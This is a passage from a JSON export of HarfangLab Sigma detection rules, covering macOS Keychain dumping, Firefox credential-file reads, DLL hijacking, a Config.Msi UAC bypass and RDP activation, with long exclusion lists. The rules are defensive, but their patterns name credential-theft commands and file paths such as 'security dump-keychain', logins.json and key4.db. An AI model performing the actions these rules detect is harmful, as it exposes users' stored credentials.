"content": "title: MacOS Keychain Exported via Dump Keychain\nid: 5bde067c-304d-4d0b-8cb9-50699ac247df\ndescription: |\n Detects the macOS Keychain being exported via security using the dump-keychain command.\n Keychain (or Keychain Services) is the macOS credential management system.\n Attackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\n It is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md\n - https://attack.mitre.org/techniques/T1555/001/\ndate: 2022/08/29\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security dump-keychain -d\n Image: '/usr/bin/security'\n CommandLine|contains: 'dump-keychain'\n ParentImage|contains: '?'\n\n # Git LFS seems to use keychain.\n exclusion_git_lfs:\n ParentImage|endswith: '/bin/git-lfs'\n CommandLine|contains|all:\n - 'find-certificate'\n - '/Library/Keychains/System.keychain'\n\n # Visual Studio Code is expected to use keychain.\n exclusion_vs_code:\n ParentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Plugin).app/Contents/MacOS/Code - Insiders Helper (Plugin)'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/MacOS/Electron'\n - '*/Visual Studio Code.app/Contents/Frameworks/Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)'\n - '/Users/*/.vscode/extensions/sonarsource.sonarlint-vscode-*-*/*/*/bin/java'\n - '/Users/*/.vscode-insiders/extensions/sonarsource.sonarlint-vscode-*-*/*/*-*/bin/java'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/MacOS/Electron'\n CommandLine|contains: 'security find-certificate -a -p'\n\n exclusion_glpi:\n ParentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_docker:\n - ParentImage: '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n GrandparentImage:\n - '/Applications/Docker.app/Contents/MacOS/Docker'\n - '/sbin/launchd'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n\n exclusion_node:\n ParentImage: '/Users/*/.nvm/versions/node/v*/bin/node'\n\n exclusion_fortinet:\n ParentImage:\n - '/Library/Application Support/Fortinet/FortiClient/bin/epctrl'\n - '/Library/Application Support/Fortinet/FortiClient/bin/ztagent'\n\n exclusion_postman:\n ParentImage: '/Applications/Postman.app/Contents/MacOS/Postman'\n\n exclusion_lens:\n ParentImage: '/Applications/Lens.app/Contents/MacOS/Lens'\n\n exclusion_ruby:\n ParentImage:\n - '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/*/bin/ruby'\n - '/System/Library/Frameworks/Ruby.framework/Versions/*/usr/bin/ruby'\n\n exclusion_azure:\n ParentImage: '/Applications/Azure Data Studio.app/Contents/Frameworks/Azure Data Studio Helper (Plugin).app/Contents/MacOS/Azure Data Studio Helper (Plugin)'\n\n exclusion_openvpn:\n GrandparentImage: '/Applications/OpenVPN Connect/OpenVPN Connect.app/Contents/MacOS/OpenVPN Connect'\n\n exclusion_rider:\n ParentImage: '/users/*/applications/rider.app/contents/macos/rider'\n\n exclusion_intellij:\n ParentImage:\n - '/Applications/IntelliJ IDEA.app/Contents/MacOS/idea'\n - '/Users/*/Library/Application Support/JetBrains/IntelliJIdea*'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - '/private/var/folders/??/*/?/AppTranslocation/'\n - '/opt/homebrew/'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5bde067c-304d-4d0b-8cb9-50699ac247df",
"rule_name": "MacOS Keychain Exported via Dump Keychain",
"rule_description": "Detects the macOS Keychain being exported via security using the dump-keychain command.\nKeychain (or Keychain Services) is the macOS credential management system.\nAttackers may export macOS Keychain to gather user credentials, certificates, payment data, or secure notes.\nIt is recommended to analyze the context around the execution of the security binary to determine if this export is legitimate.\n",
"rule_creation_date": "2022-08-29",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c110770-959d-46ff-accb-461154a9d92d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594664Z",
"creation_date": "2026-03-23T11:45:34.594667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594675Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/0xToxin/status/1622651732160282628",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_runtimebroker.yml",
"content": "title: DLL Hijacking via RuntimeBroker.exe\nid: 5c110770-959d-46ff-accb-461154a9d92d\ndescription: |\n Detects potential Windows DLL Hijacking via RuntimeBroker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/0xToxin/status/1622651732160282628\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RuntimeBroker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\rmclient.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c110770-959d-46ff-accb-461154a9d92d",
"rule_name": "DLL Hijacking via RuntimeBroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RuntimeBroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c16d11a-fb1c-47ea-92f2-3c71808bc881",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624056Z",
"creation_date": "2026-03-23T11:45:34.624058Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624063Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks",
"https://github.com/Wh04m1001/IFaultrepElevatedDataCollectionUAC",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_config_msi.yml",
"content": "title: Config.Msi UAC Bypass Executed\nid: 5c16d11a-fb1c-47ea-92f2-3c71808bc881\ndescription: |\n Detects the UAC bypass technique exploiting the MSI rollback scripts.\n Attackers with low-privileged code execution on a target host and an arbitrary file or directory delete can achieve UAC bypass with privilege escalation to SYSTEM.\n It is recommended to analyze the .rbs or rbf file to look for malicious content, as well as to look for suspicious processes stemming from msiexec during the rollback operation.\nreferences:\n - https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks\n - https://github.com/Wh04m1001/IFaultrepElevatedDataCollectionUAC\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2022/11/04\nmodified: 2026/03/19\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path:\n - '?:\\Config.Msi\\\\*.rbs'\n - '?:\\Config.Msi\\\\*.rbf'\n\n filter_legitimate_writer_1:\n - ProcessOriginalFileName:\n - 'msiexec.exe'\n - 'Wmiprvse.exe'\n - 'MDMAppInstaller.exe'\n ProcessUserSID: 'S-1-5-18'\n - ProcessImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ProcessUserSID: 'S-1-5-18'\n\n filter_legitimate_writer_2:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n\n filter_legitimate_writer_3:\n ProcessOriginalFileName: 'MDMAppInstaller.exe'\n ProcessParentImage:\n - '?:\\Windows\\System32\\omadmclient.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n filter_legitimate_writer_4:\n # C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe\n ProcessProcessName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Kaspersky Lab'\n - 'Kaspersky Lab JSC'\n\n filter_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_intune:\n ProcessImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_kerio:\n ProcessImage:\n - '?:\\Program Files\\Kerio\\UpdaterService\\ktupdaterservice.exe'\n - '?:\\Program Files (x86)\\Kerio\\UpdaterService\\ktupdaterservice.exe'\n ProcessOriginalFileName: 'ktupdaterservice.exe'\n\n exclusion_doubletake:\n ProcessImage: '?:\\Program Files\\Vision Solutions\\Double-Take\\DoubleTake.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c16d11a-fb1c-47ea-92f2-3c71808bc881",
"rule_name": "Config.Msi UAC Bypass Executed",
"rule_description": "Detects the UAC bypass technique exploiting the MSI rollback scripts.\nAttackers with low-privileged code execution on a target host and an arbitrary file or directory delete can achieve UAC bypass with privilege escalation to SYSTEM.\nIt is recommended to analyze the .rbs or rbf file to look for malicious content, as well as to look for suspicious processes stemming from msiexec during the rollback operation.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2026-03-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c19d920-4c81-4370-9af8-25e9bef6b870",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077094Z",
"creation_date": "2026-03-23T11:45:34.077096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077101Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"http://revertservice.com/10/termservice/",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://attack.mitre.org/techinques/t1021/001",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1021_001_net_start_rdp.yml",
"content": "title: Remote Desktop Services Enabled via net.exe\nid: 5c19d920-4c81-4370-9af8-25e9bef6b870\ndescription: |\n Detects command-line arguments starting the \"TermService\" service via the \"net\" utility, a service essential for enabling Remote Desktop Services.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - http://revertservice.com/10/termservice/\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://attack.mitre.org/techinques/t1021/001\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/01/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_command:\n CommandLine|contains: ' start TermService'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5c19d920-4c81-4370-9af8-25e9bef6b870",
"rule_name": "Remote Desktop Services Enabled via net.exe",
"rule_description": "Detects command-line arguments starting the \"TermService\" service via the \"net\" utility, a service essential for enabling Remote Desktop Services.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-01-16",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5c3a5ca6-ffd2-4fe9-af67-71720831dc70",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098279Z",
"creation_date": "2026-03-23T11:45:34.098281Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098285Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1552_004_read_firefox_sensitive_files_macos.yml",
"content": "title: Suspicious Read Access to Firefox Sensitive Files\nid: 5c3a5ca6-ffd2-4fe9-af67-71720831dc70\ndescription: |\n Detects a suspicious access to Firefox browser files that hold, for instance, cookies or users passwords.\n Adversaries may steal web application cookies and credentials and use them for lateral movement in websites or inside an organization.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_access:\n Path:\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/cookies.sqlite'\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/formhistory.sqlite'\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/key4.db'\n - '/Users/*/Library/Application Support/Firefox/Profiles/*/logins.json'\n ProcessImage|contains: '?'\n Kind: 'read'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n ProcessImage:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n - '/Applications/WithSecure/WithSecure Agent.app/Contents/MacOS/wsagent'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n exclusion_mcafee:\n Image: '/usr/local/McAfee/AntiMalware/VShieldScanner'\n exclusion_checkpoint:\n Image: '/Applications/Check Point/Agents/cpamdApp.app/Contents/MacOS/cpamdApp'\n exclusion_vshield_scanner:\n Image: '/usr/local/McAfee/AntiMalware/VShieldScanner'\n exclusion_kaspersky:\n Image: '/Applications/Kaspersky Anti-Virus For Mac.app/Contents/MacOS/kavd.app/Contents/MacOS/kavd'\n exclusion_norton:\n Image: '/Applications/Norton.app/Contents/Backend/utils/com.norton.mes.endpointsecurity.app/Contents/MacOS/com.norton.mes.endpointsecurity'\n exclusion_virusscanner:\n Image: '/Applications/VirusScannerPlus.app/Contents/MacOS/VirusScannerPlus'\n\n ### backup software ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n# Common browser exclusion\n filter_chrome:\n Image:\n - '/Applications/Google Chrome*.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Applications/Google Chrome*.app/Contents/MacOS/Google Chrome'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Volumes/Google Chrome/Google Chrome.app/Contents/MacOS/Google Chrome'\n - '/Users/*/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper'\n - '/Users/*/Google Chrome.app/Contents/MacOS/Google Chrome'\n exclusion_edge:\n Image:\n - '/Applications/Microsoft Edge.app/Contents/MacOS/Microsoft Edge'\n - '/Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Helpers/Microsoft Edge Helper.app/Contents/MacOS/Microsoft Edge Helper'\n exclusion_firefox:\n Image:\n - '*/Firefox*.app/Contents/MacOS/firefox'\n - '*/Firefox*.app/Contents/MacOS/pingsender'\n - '*/Firefox*.app/Contents/MacOS/crashreporter'\n - '*/Firefox*.app/Contents/MacOS/minidump-analyzer'\n - '*/Firefox*.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/Firefox* Media Plugin Helper'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/crashreporter'\n - '*/Firefox*.app/Contents/MacOS/media-plugin-helper.app/Contents/MacOS/minidump-analyzer'\n exclusion_safari:\n Image:\n - '/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n - '/System/Volumes/Preboot/Cryptexes/App/System/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.BrowserDataImportingService.xpc/Contents/MacOS/com.apple.Safari.BrowserDataImportingService'\n exclusion_arc:\n Image:\n - '/Applications/Arc.app/Contents/MacOS/Arc'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper.app/Contents/MacOS/Arc Helper'\n - '/Applications/Arc.app/Contents/Frameworks/ArcCore.framework/Versions/A/Helpers/Arc Helper (Plugin).app/Contents/MacOS/Arc Helper (Plugin)'\n filter_brave:\n Image:\n - '/Applications/Brave Browser.app/Contents/MacOS/Brave Browser'\n - '/Applications/Brave Browser.app/Contents/Frameworks/Brave Browser Framework.framework/Versions/*/Helpers/Brave Browser Helper.app/Contents/MacOS/Brave Browser Helper'\n exclusion_opera:\n Image:\n - '/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n - '/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/MacOS/Opera'\n - '/Users/*/Applications/Opera.app/Contents/Frameworks/Opera Framework.framework/Versions/*/Helpers/Opera Helper.app/Contents/MacOS/Opera Helper'\n exclusion_burp:\n Image: '/usr/local/bin/burp'\n# end common browser exclusion\n\n exclusion_custom_certutil:\n Image:\n - '/Library/Application Support/Netskope/STAgent/certutil/certutil'\n - '/Applications/Norton.app/Contents/Backend/utils/certutil/certutil'\n - '/Applications/Avast.app/Contents/Backend/utils/certutil/certutil'\n\n exclusion_soffice:\n Image: '/Applications/LibreOffice.app/Contents/MacOS/soffice'\n\n exclusion_go2meeting:\n Image: '/Users/*/Library/Application Support/LogMeInInc/GoToMeeting/G2MUpdate'\n\n exclusion_bomgar:\n Image: '/Applications/.com.bomgar.scc.*/Remote Support Customer Client.app/Contents/MacOS/sdcust'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_copy:\n Image: '/bin/cp'\n ProcessSignatureSigningId: 'com.apple.cp'\n ProcessSigned: 'true'\n\n exclusion_bzgrep:\n Image: 